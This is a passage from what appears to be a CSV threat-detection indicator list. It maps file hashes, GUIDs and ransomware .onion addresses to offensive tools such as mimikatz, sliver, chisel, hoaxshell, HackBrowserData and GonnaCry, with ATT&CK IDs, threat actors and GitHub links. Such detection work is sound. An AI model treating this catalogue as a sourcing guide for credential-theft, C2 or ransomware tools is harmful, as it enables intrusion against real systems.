Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","28515" "*6ce500821488255bc70acd310d8162308fd14a4fa214c79c2d9a354c705de6d7*",".{0,1000}6ce500821488255bc70acd310d8162308fd14a4fa214c79c2d9a354c705de6d7.{0,1000}","offensive_tool_keyword","PowerBreach","PowerBreach is a backdoor toolkit that aims to provide the user a wide variety of methods to backdoor a system","T1055 - T1203 - T1105 - T1202 - T1027 - T1059 - T1070","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/PowerShellEmpire/PowerTools","1","0","#filehash","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","28516" 
"*6ce5031943a475616dac98d91e84196abd59c8067542c442e995a0d5e46f89c2*",".{0,1000}6ce5031943a475616dac98d91e84196abd59c8067542c442e995a0d5e46f89c2.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","28517" "*6cef3ca27cf61c96477576ca98cd658b0a2b1c06c6628cfc6a36ac7357783738*",".{0,1000}6cef3ca27cf61c96477576ca98cd658b0a2b1c06c6628cfc6a36ac7357783738.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","28519" "*6cf8e628d3c3c765a55d482e7124e88f59a47949c8f677ba45b00aa0bbc7fd1a*",".{0,1000}6cf8e628d3c3c765a55d482e7124e88f59a47949c8f677ba45b00aa0bbc7fd1a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","28521" "*6cf9eeb823773e76fa991e6092ee7da5a1310697784381e2d4f74fb9071924d1*",".{0,1000}6cf9eeb823773e76fa991e6092ee7da5a1310697784381e2d4f74fb9071924d1.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","28522" "*6cfa69c4afc8b6bc2e33431b1d61210b51b3b5f204486dffe202d64a4ab73d3b*",".{0,1000}6cfa69c4afc8b6bc2e33431b1d61210b51b3b5f204486dffe202d64a4ab73d3b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28523" "*6cfa85f07f3c529fc3ca479c49104de7659010b3ca139ba6c10f7846c0ccf061*",".{0,1000}6cfa85f07f3c529fc3ca479c49104de7659010b3ca139ba6c10f7846c0ccf061.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28524" "*6d0156efe079ba8f6fbb009df73332e5dab53955613b1795f09b431cf668163a*",".{0,1000}6d0156efe079ba8f6fbb009df73332e5dab53955613b1795f09b431cf668163a.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","28526" "*6d11a3d59602508d435fc3cabba737d7b5d710e2b56b7623e903e59ac3d3f287*",".{0,1000}6d11a3d59602508d435fc3cabba737d7b5d710e2b56b7623e903e59ac3d3f287.{0,1000}","offensive_tool_keyword","csexec","An implementation of PSExec in C#","T1021.002 - T1059.004 - T1077","TA0008 - TA0009 - TA0011","N/A","N/A","Lateral Movement","https://github.com/malcomvetter/CSExec","1","0","#filehash","N/A","10","4","325","62","2020-12-01T14:52:01Z","2018-08-08T21:09:07Z","28528" "*6d1e90be1c1fdcc12ccf00d729b42d5f028ea8bd6f372fa1075e43fe4ef506a6*",".{0,1000}6d1e90be1c1fdcc12ccf00d729b42d5f028ea8bd6f372fa1075e43fe4ef506a6.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 
- TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","28529" "*6d36fafede6a64aa20f1581d749024d75bb7d3b9c311c6bf1a3b5a31eefe9581*",".{0,1000}6d36fafede6a64aa20f1581d749024d75bb7d3b9c311c6bf1a3b5a31eefe9581.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","28532" "*6d3a0257132fce02f5dcb7d7ccc7fb73db233daae688ebb01de0129d4b448998*",".{0,1000}6d3a0257132fce02f5dcb7d7ccc7fb73db233daae688ebb01de0129d4b448998.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","28533" "*6d4393769a27fd089c9c9f9a52f59e8275397c1c3b8df8ca7c972a3246cb9392*",".{0,1000}6d4393769a27fd089c9c9f9a52f59e8275397c1c3b8df8ca7c972a3246cb9392.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","#filehash","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","28534" 
"*6d45c0c6898be7c975f3c985fb13f3de05055884dc73b028cf6014a15059df01*",".{0,1000}6d45c0c6898be7c975f3c985fb13f3de05055884dc73b028cf6014a15059df01.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","28535" "*6d47d0d25502192988e01283d2d2e51e02a8fb9e611b7b8a2f5ccb172ba75483*",".{0,1000}6d47d0d25502192988e01283d2d2e51e02a8fb9e611b7b8a2f5ccb172ba75483.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","28537" "*6d56de09348b53ca55bedaa5fbef8d37da5c65f1c170d4bae3f63771295bbe5c*",".{0,1000}6d56de09348b53ca55bedaa5fbef8d37da5c65f1c170d4bae3f63771295bbe5c.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28539" "*6d5aef94f94fcf9b0987102f2b436e37f173e9638b08d1cd45d14132071617db*",".{0,1000}6d5aef94f94fcf9b0987102f2b436e37f173e9638b08d1cd45d14132071617db.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential 
Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","28540" "*6d5cc4d1a8fcd83a5b3a6468f8e45a702836579926920267b8f320b7a2b82e1c*",".{0,1000}6d5cc4d1a8fcd83a5b3a6468f8e45a702836579926920267b8f320b7a2b82e1c.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","28541" "*6d5da6436d72bcdffdb2e5bb5b0b20ada0c23d10c1fef1080795c86e51509fae*",".{0,1000}6d5da6436d72bcdffdb2e5bb5b0b20ada0c23d10c1fef1080795c86e51509fae.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","28542" "*6d60cf4588ebcb6070f39b0949841c1ee3cc5f05ed72e2820692d1b53808fdcd*",".{0,1000}6d60cf4588ebcb6070f39b0949841c1ee3cc5f05ed72e2820692d1b53808fdcd.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","28543" "*6d6629cbd6d624b1a977decf53adbb0e2fb46a07d8ac7392324572dbafe26d48*",".{0,1000}6d6629cbd6d624b1a977decf53adbb0e2fb46a07d8ac7392324572dbafe26d48.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement 
within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#filehash","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","28546" "*6D663511-76E4-4D74-9B3E-191E1471C4EF*",".{0,1000}6D663511\-76E4\-4D74\-9B3E\-191E1471C4EF.{0,1000}","offensive_tool_keyword","pwnlook","An offensive postexploitation tool that will give you complete control over the Outlook desktop application and therefore to the emails configured in it","T1114 - T1071 - T1059 - T1113 - T1123","TA0002 - TA0005 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/amjcyber/pwnlook","1","0","#GUIDproject","N/A","6","2","166","18","2024-10-09T07:50:04Z","2024-09-19T10:26:16Z","28547" "*6d6a190059cb9ace0b4e16aace82f752ae57df9b36db03508acb3bb4fabe4d05*",".{0,1000}6d6a190059cb9ace0b4e16aace82f752ae57df9b36db03508acb3bb4fabe4d05.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","28549" "*6d755e74fb426af04016752db3be2c0c17aad722173e96f5797648c1ceda2cf3*",".{0,1000}6d755e74fb426af04016752db3be2c0c17aad722173e96f5797648c1ceda2cf3.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#filehash","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","28550" "*6d820b495719031338017f6138fae3546f549e9e816274554f6c21a77149b778*",".{0,1000}6d820b495719031338017f6138fae3546f549e9e816274554f6c21a77149b778.{0,1000}","offensive_tool_keyword","BadWindowsService","An insecurely implemented and installed Windows service for emulating elevation of privileges 
vulnerabilities","T1068 - T1211 - T1050","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/eladshamir/BadWindowsService","1","0","#filehash","N/A","10","1","58","10","2022-08-25T14:22:25Z","2022-08-19T15:38:05Z","28553" "*6d83e7f5c378f8596963e4efbfa9a8b39d183ad21134f8c7dad81ef40c7be9eb*",".{0,1000}6d83e7f5c378f8596963e4efbfa9a8b39d183ad21134f8c7dad81ef40c7be9eb.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","28554" "*6d878963a9bc68106e1a6bfdbde3e2d72445d86e65c1613cd07344104c0995c2*",".{0,1000}6d878963a9bc68106e1a6bfdbde3e2d72445d86e65c1613cd07344104c0995c2.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","28555" "*6d8bb861a501aecaf9ebf95433d31001fcd529a644be5438c6de49b3afc9d87b*",".{0,1000}6d8bb861a501aecaf9ebf95433d31001fcd529a644be5438c6de49b3afc9d87b.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege 
Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28556" "*6d93cc6c0eebf09311c01439395e8f02def87ffe8b4abf010ff5f8f18603f96c*",".{0,1000}6d93cc6c0eebf09311c01439395e8f02def87ffe8b4abf010ff5f8f18603f96c.{0,1000}","offensive_tool_keyword","ShimMe","Injects a DLL into a suspended process running as SYSTEM via the OfficeClickToRun service for privilege escalation - Shim Injector: Injects a DLL into a process by modifying shim data in memory without creating or registering new SDB files to evade detection.","T1055 - T1053 - T1548.002 - T1078 - T1546 - T1070","TA0004 - TA0005 - TA0006 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/ShimMe","1","0","#filehash","N/A","9","2","140","20","2024-10-29T07:33:38Z","2024-08-04T10:03:28Z","28557" "*6d955490b7ccb6ef77222ec41f494c186050fd9b6b022451ab8ec48104d79673*",".{0,1000}6d955490b7ccb6ef77222ec41f494c186050fd9b6b022451ab8ec48104d79673.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor 
- DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","28559" "*6d96904c0085f49b27a47e4d75542fe8d28b6de9431038d72fdfdb2f51e43171*",".{0,1000}6d96904c0085f49b27a47e4d75542fe8d28b6de9431038d72fdfdb2f51e43171.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","0","#filehash","N/A","N/A","10","3212","499","2025-01-19T12:29:35Z","2022-07-10T15:36:24Z","28560" "*6d97644d0cc23ec724b2f6ec91ac273eedefd5d7f2c20b7b913b4e9ff582b183*",".{0,1000}6d97644d0cc23ec724b2f6ec91ac273eedefd5d7f2c20b7b913b4e9ff582b183.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28561" "*6da016cefca0a050afb4c3dbf5e07f1af4fe69b24f1be45e56444fef537fd2b3*",".{0,1000}6da016cefca0a050afb4c3dbf5e07f1af4fe69b24f1be45e56444fef537fd2b3.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - 
TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","28564" "*6da346eecac1a1bb11f834be0ef0b08539fb0f9ec7d8cc415ae9e301f53a536e*",".{0,1000}6da346eecac1a1bb11f834be0ef0b08539fb0f9ec7d8cc415ae9e301f53a536e.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","28566" "*6dc00f1acf40361ca3eacdab7447097f1e3cd5ddb493e8d42f56d61d5f6c6efc*",".{0,1000}6dc00f1acf40361ca3eacdab7447097f1e3cd5ddb493e8d42f56d61d5f6c6efc.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","28570" "*6dcf39d63a055602fdd1747fe84392641926ec16ed9aae3c136d2915ad83bdcf*",".{0,1000}6dcf39d63a055602fdd1747fe84392641926ec16ed9aae3c136d2915ad83bdcf.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28572" "*6dcf6d012c1eeb396082ea834f963cd8740babc71d3fd7114664d76dd5975d9c*",".{0,1000}6dcf6d012c1eeb396082ea834f963cd8740babc71d3fd7114664d76dd5975d9c.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","28573" "*6DD22880-DAC5-4B4D-9C91-8C35CC7B8180*",".{0,1000}6DD22880\-DAC5\-4B4D\-9C91\-8C35CC7B8180.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#GUIDproject","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","28574" "*6dd3dfa923bbabf3c493ef9fc309f3dba682eb2a7d0c2f5e7bbd069a36204d04*",".{0,1000}6dd3dfa923bbabf3c493ef9fc309f3dba682eb2a7d0c2f5e7bbd069a36204d04.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use 
SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","28575" "*6dd8dd402142c1671bc971aaa32cdf724daf86ec635b24b7f7f2977da7b349f7*",".{0,1000}6dd8dd402142c1671bc971aaa32cdf724daf86ec635b24b7f7f2977da7b349f7.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","28576" "*6DE0DE7E-A81D-4194-B36A-3E67283FCABE*",".{0,1000}6DE0DE7E\-A81D\-4194\-B36A\-3E67283FCABE.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","0","#GUIDProject","N/A","9","","N/A","","","","28578" "*6de3b230db2fe85c44a7250e0f9882599ec706d0e360ccad805f311d0e1fbc14*",".{0,1000}6de3b230db2fe85c44a7250e0f9882599ec706d0e360ccad805f311d0e1fbc14.{0,1000}","offensive_tool_keyword","webshell","collection of webshell 
- observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","28580" "*6df4c790fd104f1a9e2e68cf8411c39280df7c4b1f2ada6ab1836546645d6865*",".{0,1000}6df4c790fd104f1a9e2e68cf8411c39280df7c4b1f2ada6ab1836546645d6865.{0,1000}","offensive_tool_keyword","GonnaCry","a linux ransomware","T1486 - T1059 - T1020 - T1083 - T1070","TA0040 - TA0005 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/tarcisio-marinho/GonnaCry","1","0","#filehash #linux","N/A","10","8","717","402","2025-01-24T13:39:57Z","2017-05-12T23:46:28Z","28582" "*6dfbe4a35f1c89c0be4f6c10d9e9ada69d75095c66dda39445f38e1522b5f1c1*",".{0,1000}6dfbe4a35f1c89c0be4f6c10d9e9ada69d75095c66dda39445f38e1522b5f1c1.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","28585" "*6dtxgqam4crv6rr6.onion*",".{0,1000}6dtxgqam4crv6rr6\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","28586" "*6dtxgqam4crv6rr6.onion.cab*",".{0,1000}6dtxgqam4crv6rr6\.onion\.cab.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","28587" 